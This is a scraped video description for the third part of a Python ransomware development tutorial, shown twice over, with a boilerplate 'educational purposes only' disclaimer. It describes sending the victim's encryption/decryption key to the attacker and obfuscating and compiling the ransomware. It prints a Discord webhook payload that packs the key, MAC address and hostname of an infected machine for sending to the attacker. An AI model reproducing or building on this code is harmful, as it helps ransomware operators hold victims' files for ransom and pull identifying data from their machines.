filmov
tv
Ransomware Development in Python | Part #3

Показать описание
welcome back everyone, this is the 3rd and the final part of Ransomware Development series in python in this Part i have shown how we can send the Encryption/Decryption Key to attacked rather than storing it on Victim pc locally also later on i have shown how we can obfuscate and compile the source codes.
Discord Embed:
webhook_data = {"username": "BotName", "embeds": [
dict(title="Encrypted a System.",
fields=[
{
"name": "**E/D Key**",
"value": f'||{key}||',
"inline": True
},
{
"name": "**IP Address**",
"inline": True
},
{
"name": "**PC info**",
"value": f"mac: `{mac}` \nPC name: `{gethostname()}`",
"inline": True
},
]),
]}
❗❗❗❗❗Disclaimer❗❗❗❗❗
This Video is made for educational purposes only. The Owner of the Video will not be Responsible for any illegal activities Did following the Video Tutorial .
***********************************************************
🛰🛰🛰My Socials🛰🛰🛰
Like | Subscribe | Share the video | Comment | Join the Discord server.
Thanks For Watching!!!
💖💖💖💖🤗🤗🤗🤗💚💚💚💚💛💛💛💛
Discord Embed:
webhook_data = {"username": "BotName", "embeds": [
dict(title="Encrypted a System.",
fields=[
{
"name": "**E/D Key**",
"value": f'||{key}||',
"inline": True
},
{
"name": "**IP Address**",
"inline": True
},
{
"name": "**PC info**",
"value": f"mac: `{mac}` \nPC name: `{gethostname()}`",
"inline": True
},
]),
]}
❗❗❗❗❗Disclaimer❗❗❗❗❗
This Video is made for educational purposes only. The Owner of the Video will not be Responsible for any illegal activities Did following the Video Tutorial .
***********************************************************
🛰🛰🛰My Socials🛰🛰🛰
Like | Subscribe | Share the video | Comment | Join the Discord server.
Thanks For Watching!!!
💖💖💖💖🤗🤗🤗🤗💚💚💚💚💛💛💛💛
Комментарии